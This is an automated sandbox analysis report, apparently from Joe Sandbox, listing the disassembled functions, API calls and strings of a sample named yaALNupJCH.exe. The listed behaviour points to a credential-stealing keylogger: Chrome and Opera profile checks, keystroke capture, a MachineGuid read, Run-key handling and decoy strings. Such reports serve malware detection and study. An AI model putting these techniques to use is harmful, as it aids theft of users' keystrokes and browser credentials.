Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: UserProfile$\AppData\Local\Google\Chrome\
API String ID: 1174141254-4188645398
Opcode ID: dbb064bb5b4bf66a503eaaf675d666d45601800878e5ea5b066fb89d856d310f
Instruction ID: 57f2599c21fdc32d718450e2580da6f8e29e9aa57867b8a4561a60834e957018
Opcode Fuzzy Hash: dbb064bb5b4bf66a503eaaf675d666d45601800878e5ea5b066fb89d856d310f
Instruction Fuzzy Hash: 90F05E30A0021996C604BBB69C578BF7B2C9D10709B40017FB601B21D2EE78994586EE

Uniqueness

Uniqueness Score: -1.00%

Function 0040C4D7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C50A

Strings

\Opera Software\Opera Stable\, xrefs: 0040C4F4
AppData, xrefs: 0040C4DE

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: AppData$\Opera Software\Opera Stable\
API String ID: 1174141254-1629609700
Opcode ID: bfb98eb5c4fc4ad5219d5d8c2d064a843409f917bf550090613a0a5d327717e0
Instruction ID: 4f687090449c5efc0469f9fcadb94194348ed293e3e387ab461cbc240459fd33
Opcode Fuzzy Hash: bfb98eb5c4fc4ad5219d5d8c2d064a843409f917bf550090613a0a5d327717e0
Instruction Fuzzy Hash: 55F05E30A00219A6CA04B7F69C578EF7B6C9D10709B00017BB602B21D2EE789D4586EA

Uniqueness

Uniqueness Score: -1.00%

Function 0040B594 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000011), ref: 0040B599

Part of subcall function 0040A3E0: GetForegroundWindow.USER32(00000000,?,00000000), ref: 0040A414
Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A41F
Part of subcall function 0040A3E0: GetKeyboardLayout.USER32 ref: 0040A426
Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A430
Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43D
Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A459

Part of subcall function 0040A584: SetEvent.KERNEL32(?,?,00000000,0040B158,00000000), ref: 0040A5B0

Strings

[AltL], xrefs: 0040B5DB
[AltR], xrefs: 0040B5CF

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
String ID: [AltL]$[AltR]
API String ID: 3195419117-2658077756
Opcode ID: 09e7acf5dca60817c7f08b9e07d08db97250d0ddf7d901bec0859fbcc6ba5a63
Instruction ID: 5b499cff6aaae3c53dc3e1166fb83c1288de984d5ca86385b07af6415785c0e2
Opcode Fuzzy Hash: 09e7acf5dca60817c7f08b9e07d08db97250d0ddf7d901bec0859fbcc6ba5a63
Instruction Fuzzy Hash: 7AE0652170021066C828323D6D1F66E2951DB41758B4001BFFC426B6CAEABD4E1546CF

Uniqueness

Uniqueness Score: -1.00%

Function 0044EBAC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

GetOEMCP.KERNEL32(00000000,?,?,0044EE35,?), ref: 0044EBD7
GetACP.KERNEL32(00000000,?,?,0044EE35,?), ref: 0044EBEE

Strings

5D, xrefs: 0044EBC5

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID:
String ID: 5D
API String ID: 0-3475471828
Opcode ID: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
Instruction ID: dd86e4deb3fd1fb56fb386e402429c764a368b420efd63c67ba3ad0e757172fe
Opcode Fuzzy Hash: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
Instruction Fuzzy Hash: 8DF0C831400104CBEB20DB59DC8C76A7771FB00335F144755E52A866E2C7B99C81CF8D

Uniqueness

Uniqueness Score: -1.00%

Function 004160D8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004160F6

Strings

!D@, xrefs: 00416FD7
open, xrefs: 004160F0

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ExecuteShell
String ID: !D@$open
API String ID: 587946157-1586967515
Opcode ID: 453d0a70b3f563ea5a3135f3bc09350ed02b1cc902b7fa42382088d4a523be4d
Instruction ID: 272896446fdd02a3c20b9e2560cdc717c469be1552f5b7850574438bcff29664
Opcode Fuzzy Hash: 453d0a70b3f563ea5a3135f3bc09350ed02b1cc902b7fa42382088d4a523be4d
Instruction Fuzzy Hash: 98E012712483059AD614EA72DC91EFEB35CAB50755F400C3FF906954E2EF3C5C49C659

Uniqueness

Uniqueness Score: -1.00%

Function 0040B5EE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000012), ref: 0040B5F3

Strings

[CtrlL], xrefs: 0040B621
[CtrlR], xrefs: 0040B610

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: State
String ID: [CtrlL]$[CtrlR]
API String ID: 1649606143-2446555240
Opcode ID: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
Instruction ID: 0a29407495d8d2227e56f06805126889c23c54001464371f268d9f95623807a6
Opcode Fuzzy Hash: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
Instruction Fuzzy Hash: 86E0863174431057C514363D5A2B6792911D752B54F42097FE882676CADAFF8D1603CF

Uniqueness

Uniqueness Score: -1.00%

Function 00413971 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D092,00000000,004752D8,004752F0,?,pth_unenc), ref: 0041397F
RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00413993

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041397D

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: DeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
API String ID: 2654517830-1051519024
Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
Instruction ID: 598427e10cd0738da965e261ca374841197e4f19c32ff2ed64c8c0b72025bf2e
Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
Instruction Fuzzy Hash: C0E08C71254208FBDF104F71DC06FEA772CDB01B02F1046A9BA0692091C6668E159664

Uniqueness

Uniqueness Score: -1.00%

Function 0040B7B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B7C4
RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B7EF

Strings

pth_unenc, xrefs: 0040B7B7

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: DeleteDirectoryFileRemove
String ID: pth_unenc
API String ID: 3325800564-4028850238
Opcode ID: 88e96a8173b682c54d564dd3c6d6f117ced71a209c30aa3c6350f34697caf810
Instruction ID: 8946e93c50c242ae22eab23d4fc85e5ed07eddfaa886144743a5101fb039176e
Opcode Fuzzy Hash: 88e96a8173b682c54d564dd3c6d6f117ced71a209c30aa3c6350f34697caf810
Instruction Fuzzy Hash: 17E046311006129BCB14AB258848AD63398AB5031AF00086BA492A32A1EF38A809CAAC

Uniqueness

Uniqueness Score: -1.00%

Function 0040A22D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,0040A273,004750F0,00000000,00000000), ref: 0040A255

Strings

XQG, xrefs: 0040A231
C}w, xrefs: 0040A255

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID: XQG$C}w
API String ID: 2422867632-2289786348
Opcode ID: 3b2bb30f866a8d561d09dfcf7fc0405b6eaa6af24d263e7c8f742c90a56f00aa
Instruction ID: 2a1cbdb8206e100bb01696748888ff261754bca91143acd1fcdc8c9c5a32c2bb
Opcode Fuzzy Hash: 3b2bb30f866a8d561d09dfcf7fc0405b6eaa6af24d263e7c8f742c90a56f00aa
Instruction Fuzzy Hash: 37D05B609403467DE600A7308C55F7B334CE750705F40847FB589E51E1DBBC9D54961D

Uniqueness

Uniqueness Score: -1.00%

Function 0041279E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON

Download Yara Rule

APIs

TerminateProcess.KERNEL32(00000000,pth_unenc,0040F816), ref: 004127AE
WaitForSingleObject.KERNEL32(000000FF), ref: 004127C1

Strings

pth_unenc, xrefs: 0041279E

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ObjectProcessSingleTerminateWait
String ID: pth_unenc
API String ID: 1872346434-4028850238
Opcode ID: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
Instruction ID: 1c2a9d3d993a2aa40768a62e13ec0bdc830226799852dc8a6b6faba0c59f1205
Opcode Fuzzy Hash: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
Instruction Fuzzy Hash: 2FD01234189312FFD7350F60EE4DB043B98A705362F140265F428512F1C7A58994EA59

Uniqueness

Uniqueness Score: -1.00%

Function 00440BD1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440C67
GetLastError.KERNEL32 ref: 00440C75
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440CD0

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 77b723f1483c6ef79eaf4aa6ca227525f645002ebe34907890468f50899a5783
Instruction ID: e49dfba6500d6e6d0807855c13dbf11e238b692b51ebe0c496a3b0b53f15648d
Opcode Fuzzy Hash: 77b723f1483c6ef79eaf4aa6ca227525f645002ebe34907890468f50899a5783
Instruction Fuzzy Hash: 04413B74900206EFEF258FA5C88477F7BA4EF45310F10416AFA555B3A1DB389D21CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00411AAD Relevance: 5.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411E3E), ref: 00411ADA
IsBadReadPtr.KERNEL32(?,00000014,00411E3E), ref: 00411BA6
SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BC8
SetLastError.KERNEL32(0000007E,00411E3E), ref: 00411BDF

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ErrorLastRead
String ID:
API String ID: 4100373531-0
Opcode ID: d73a6a570accd9d678158fa0247393ac9b593d34a1829b4547152882449a6a98
Instruction ID: c8bc6cb37384f26264b50b04770b4c06cdfb05c419d180bf3ed7721445b965b7
Opcode Fuzzy Hash: d73a6a570accd9d678158fa0247393ac9b593d34a1829b4547152882449a6a98
Instruction Fuzzy Hash: FA419D716083059FDB248F59DC84BA7B7E8FF44715F00482EEA86876A1E738F945CB19

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: yaALNupJCH.exePID: 7592, Parent PID: 7428COMMON

Execution Graph

Execution Coverage:	10.1%
Dynamic/Decrypted Code Coverage:	28.7%
Signature Coverage:	0%
Total number of Nodes:	2000
Total number of Limit Nodes:	91

Executed Functions

Function 61E4B8A1 Relevance: 1.6, APIs: 1, Instructions: 323COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E4BBA6

Memory Dump Source

Source File: 00000003.00000002.910580394.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.910576218.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910593168.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910615115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910629670.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910635803.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910647357.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910647357.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910673455.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_yaALNupJCH.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: a8ff26a4ae31eb3c0b072aa693abe32b47297d605d85dc291845808d49d3b3ac
Instruction ID: 0d30bdf3ca1535cc6e9debfec2a3fa3a34d16498aff86589297f71c0a5a37c1e
Opcode Fuzzy Hash: a8ff26a4ae31eb3c0b072aa693abe32b47297d605d85dc291845808d49d3b3ac
Instruction Fuzzy Hash: 7DC15D30E082858BEB15CFA8E4D079D7AF1AF8831CF29C46DD8469B349EB74D885CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0040104E Relevance: 226.1, APIs: 105, Strings: 24, Instructions: 339
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,00001770), ref: 0040105D
RtlAllocateHeap.NTDLL(00000000), ref: 00401064
lstrcatW.KERNEL32(00000000,Stiletto), ref: 00401079
lstrcatW.KERNEL32(?,00439390), ref: 00401083
lstrcatW.KERNEL32(?,0043938C), ref: 0040108D
lstrcatW.KERNEL32(?,2008), ref: 00401097
lstrcatW.KERNEL32(?,American), ref: 004010A1
lstrcatW.KERNEL32(?,direct), ref: 004010AB
lstrcatW.KERNEL32(?,00439354), ref: 004010B5
lstrcatW.KERNEL32(?,video), ref: 004010BF
lstrcatW.KERNEL32(?,action), ref: 004010C9
lstrcatW.KERNEL32(?,film), ref: 004010D3
lstrcatW.KERNEL32(?,directed), ref: 004010DD
lstrcatW.KERNEL32(?,00439310), ref: 004010E7
lstrcatW.KERNEL32(?,Nick), ref: 004010F1
lstrcatW.KERNEL32(?,Vallelonga), ref: 004010FC
lstrcatW.KERNEL32(?,and), ref: 00401107
lstrcatW.KERNEL32(?,produced), ref: 00401111
lstrcatW.KERNEL32(?,00439310), ref: 0040111B
lstrcatW.KERNEL32(?,Nick), ref: 00401125
lstrcatW.KERNEL32(?,Vallelonga), ref: 0040112B
lstrcatW.KERNEL32(?,and), ref: 00401131
lstrcatW.KERNEL32(?,Warren), ref: 0040113B
lstrcatW.KERNEL32(?,Ostergard), ref: 00401145
lstrcatW.KERNEL32(?,004392A4), ref: 0040114F
lstrcatW.KERNEL32(?,stars), ref: 00401159
lstrcatW.KERNEL32(?,Tom), ref: 00401164
lstrcatW.KERNEL32(?,Berenger), ref: 0040116E
lstrcatW.KERNEL32(?,Michael), ref: 00401178
lstrcatW.KERNEL32(?,Biehn), ref: 00401182
lstrcatW.KERNEL32(?,Stana), ref: 0040118C
lstrcatW.KERNEL32(?,Katic), ref: 00401196
lstrcatW.KERNEL32(?,William), ref: 004011A0
lstrcatW.KERNEL32(?,Forsythe), ref: 004011AA
lstrcatW.KERNEL32(?,and), ref: 004011B0
lstrcatW.KERNEL32(?,Tom), ref: 004011B6
lstrcatW.KERNEL32(?,Sizemore), ref: 004011C0
lstrlenW.KERNEL32(?), ref: 004011CB
lstrlenW.KERNEL32(?), ref: 004011D0
lstrlenW.KERNEL32(?), ref: 004011D5
lstrlenW.KERNEL32(?), ref: 004011DA
lstrlenW.KERNEL32(?), ref: 004011DF
lstrlenW.KERNEL32(?), ref: 004011E4
_memset.LIBCMT ref: 004011EE
LocalAlloc.KERNEL32(00000040,?), ref: 004011FD
lstrcatW.KERNEL32(?,Stiletto), ref: 0040120E
lstrcatW.KERNEL32(?,00439390), ref: 00401218
lstrcatW.KERNEL32(?,0043938C), ref: 00401222
lstrcatW.KERNEL32(?,2008), ref: 0040122C
lstrcatW.KERNEL32(?,American), ref: 00401236
lstrcatW.KERNEL32(?,direct), ref: 00401240
lstrcatW.KERNEL32(?,00439354), ref: 0040124A
lstrcatW.KERNEL32(?,video), ref: 00401254
lstrcatW.KERNEL32(?,action), ref: 0040125E
lstrcatW.KERNEL32(?,film), ref: 00401268
lstrcatW.KERNEL32(?,directed), ref: 00401272
lstrcatW.KERNEL32(?,00439310), ref: 0040127C
lstrcatW.KERNEL32(?,Nick), ref: 00401286
lstrcatW.KERNEL32(?,Vallelonga), ref: 00401290
lstrcatW.KERNEL32(?,and), ref: 00401296
lstrcatW.KERNEL32(?,produced), ref: 004012A0
lstrcatW.KERNEL32(?,00439310), ref: 004012AA
lstrcatW.KERNEL32(?,Nick), ref: 004012B4
lstrcatW.KERNEL32(?,Vallelonga), ref: 004012BE
lstrcatW.KERNEL32(?,and), ref: 004012C4
lstrcatW.KERNEL32(?,Warren), ref: 004012CE
lstrcatW.KERNEL32(?,Ostergard), ref: 004012D8
lstrcatW.KERNEL32(?,004392A4), ref: 004012E2
lstrcatW.KERNEL32(?,stars), ref: 004012EC
lstrcatW.KERNEL32(?,Tom), ref: 004012F6
lstrcatW.KERNEL32(?,Berenger), ref: 00401300
lstrcatW.KERNEL32(?,Michael), ref: 0040130A
lstrcatW.KERNEL32(?,Biehn), ref: 00401314
lstrcatW.KERNEL32(?,Stana), ref: 0040131E
lstrcatW.KERNEL32(?,Katic), ref: 00401328
lstrcatW.KERNEL32(?,William), ref: 00401332
lstrcatW.KERNEL32(?,Forsythe), ref: 0040133C
lstrcatW.KERNEL32(?,and), ref: 00401342
lstrcatW.KERNEL32(?,Tom), ref: 0040134C
lstrcatW.KERNEL32(?,Sizemore), ref: 00401356
lstrlenW.KERNEL32(?), ref: 0040135B
lstrlenW.KERNEL32(?), ref: 00401360
lstrlenW.KERNEL32(?), ref: 00401365
lstrlenW.KERNEL32(?), ref: 0040136A
lstrlenW.KERNEL32(?), ref: 0040136F
lstrlenW.KERNEL32(?), ref: 00401374
_memset.LIBCMT ref: 0040137F
lstrlenW.KERNEL32(?), ref: 00401394
lstrlenW.KERNEL32(?), ref: 00401399
lstrlenW.KERNEL32(?), ref: 0040139E
lstrlenW.KERNEL32(?), ref: 004013A3
lstrlenW.KERNEL32(?), ref: 004013B5
lstrlenW.KERNEL32(?), ref: 004013BA
lstrlenW.KERNEL32(?), ref: 004013BF
lstrlenW.KERNEL32(?), ref: 004013C4
_strlen.LIBCMT ref: 004013C9
lstrlenW.KERNEL32(?), ref: 004013EB
lstrlenW.KERNEL32(?), ref: 004013F0
lstrlenW.KERNEL32(?), ref: 004013F5
lstrlenW.KERNEL32(?), ref: 004013FA
lstrlenW.KERNEL32(?), ref: 00401405
lstrlenW.KERNEL32(?), ref: 0040140A
lstrlenW.KERNEL32(?), ref: 0040140F
lstrlenW.KERNEL32(?), ref: 00401414
_memset.LIBCMT ref: 0040141E

Strings

Berenger, xrefs: 00401166, 004012F8
Nick, xrefs: 004010E9, 0040111D, 0040127E, 004012AC
Warren, xrefs: 00401133, 004012C6
2008, xrefs: 0040108F, 00401224
Sizemore, xrefs: 004011B8, 0040134E
directed, xrefs: 004010D5, 0040126A
American, xrefs: 00401099, 0040122E
Biehn, xrefs: 0040117A, 0040130C
Ostergard, xrefs: 0040113D, 004012D0
action, xrefs: 004010C1, 00401256
video, xrefs: 004010B7, 0040124C
produced, xrefs: 00401109, 00401298
Michael, xrefs: 00401170, 00401302
direct, xrefs: 004010A3, 00401238
Forsythe, xrefs: 004011A2, 00401334
and, xrefs: 004010FE, 00401103, 0040112D, 004011AC, 00401292, 004012C0, 0040133E
Vallelonga, xrefs: 004010F3, 004010F8, 00401127, 00401288, 004012B6
Katic, xrefs: 0040118E, 00401320
stars, xrefs: 00401151, 004012E4
Stiletto, xrefs: 00401070, 00401203
Tom, xrefs: 0040115B, 00401160, 004011B2, 004012EE, 00401344
film, xrefs: 004010CB, 00401260
Stana, xrefs: 00401184, 00401316
William, xrefs: 00401198, 0040132A

Memory Dump Source

Source File: 00000003.00000002.907271529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.907271529.000000000045B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.907271529.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$_memset$Heap$AllocAllocateLocalProcess_strlen
String ID: 2008$American$Berenger$Biehn$Forsythe$Katic$Michael$Nick$Ostergard$Sizemore$Stana$Stiletto$Tom$Vallelonga$Warren$William$action$and$direct$directed$film$produced$stars$video
API String ID: 1440388185-1919393085
Opcode ID: 113251238fef3f83970f6924f453b20cb6520b497cc1392a2e42dd0c411ddb66
Instruction ID: 977ff658fd9bf0c87a79d801542fd28d69e8797ade22b74be8fc9e572a10d5fa
Opcode Fuzzy Hash: 113251238fef3f83970f6924f453b20cb6520b497cc1392a2e42dd0c411ddb66
Instruction Fuzzy Hash: B3B12C70D4055CFACF11ABA2CE4AE8FBE75EF48754F2114A2B504611B18BB65F20FE58

Uniqueness

Uniqueness Score: -1.00%

Function 0041A096 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0041A0D3
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,00000000), ref: 0041A0F2
RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 0041A117
RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0041A123
CharToOemA.USER32(?,?), ref: 0041A137

Strings

MachineGuid, xrefs: 0041A10C
SOFTWARE\Microsoft\Cryptography, xrefs: 0041A0E8

Memory Dump Source

Source File: 00000003.00000002.907271529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.907271529.000000000045B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.907271529.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CharCloseOpenQueryValue_memset
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 2235053359-1211650757
Opcode ID: e8916606853f80183d4e4cac180bd5b07d2806068a04618f474400d0608ba2a1
Instruction ID: 2f48f5834e2454bc24746ae46a99f57378d54fc204fa25418032dda9b16ec4f5
Opcode Fuzzy Hash: e8916606853f80183d4e4cac180bd5b07d2806068a04618f474400d0608ba2a1
Instruction Fuzzy Hash: 1E1182B590032CAFDB10DF60DC89EEAB7BCEB04348F1041B6B615E2152D7749E888F94

Uniqueness

Uniqueness Score: -1.00%

Function 00416019 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00416020
_memcmp.LIBCMT ref: 0041604D
_memset.LIBCMT ref: 00416076
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00000000,000003E8,?,?,?,?,?,0000008C,000000FF,00000000), ref: 004160B1

Part of subcall function 00405421: _memmove.LIBCMT ref: 00405445

Part of subcall function 00404E94: _memmove.LIBCMT ref: 00404EB4

Strings

NULL, xrefs: 00416121
v10, xrefs: 00416047

Memory Dump Source

Source File: 00000003.00000002.907271529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.907271529.000000000045B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.907271529.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _memmove$AllocH_prolog3_Local_memcmp_memset
String ID: NULL$v10
API String ID: 2751976447-1391045996
Opcode ID: 9e3a0b8306df1a542b035b3b1626d2d2149344276e7aa24a958d8489b464d727
Instruction ID: f4d55729467cdbdb5257fc1db8c5069637448291e69c50e1de44170b757c4793
Opcode Fuzzy Hash: 9e3a0b8306df1a542b035b3b1626d2d2149344276e7aa24a958d8489b464d727
Instruction Fuzzy Hash: 02310AB1D01219ABDB10DFA9D981AEEBBB9FF08314F64002EF905A7281D7799944CF58

Uniqueness

Uniqueness Score: -1.00%

Function 61E4C7C5 Relevance: 8.0, APIs: 4, Strings: 1, Instructions: 467COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E4C91F
memcmp.MSVCRT ref: 61E4C973
memcmp.MSVCRT ref: 61E4C9F2
memcmp.MSVCRT ref: 61E4CC23

Strings

0, xrefs: 61E4CC0C

Memory Dump Source

Source File: 00000003.00000002.910580394.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.910576218.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910593168.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910615115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910629670.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910635803.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910647357.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910647357.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.910673455.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_yaALNupJCH.jbxd

Similarity

API ID: memcmp
String ID: 0
API String ID: 1475443563-4108050209
Opcode ID: 3588805e3ffade70bff82764852c82c4248bf0e7dbb84644676dab7fcfb51e0f
Instruction ID: 3bb57cbd4086e38ca070a1eb41e2420ec87b0c0feb17810d174f813009c16240
Opcode Fuzzy Hash: 3588805e3ffade70bff82764852c82c4248bf0e7dbb84644676dab7fcfb51e0f
Instruction Fuzzy Hash: 66127D70F05255CFEB05CFA8E484789BBF1AF48318F25C1A9D845AB356D774E88ACB80

Uniqueness

Uniqueness Score: -1.00%

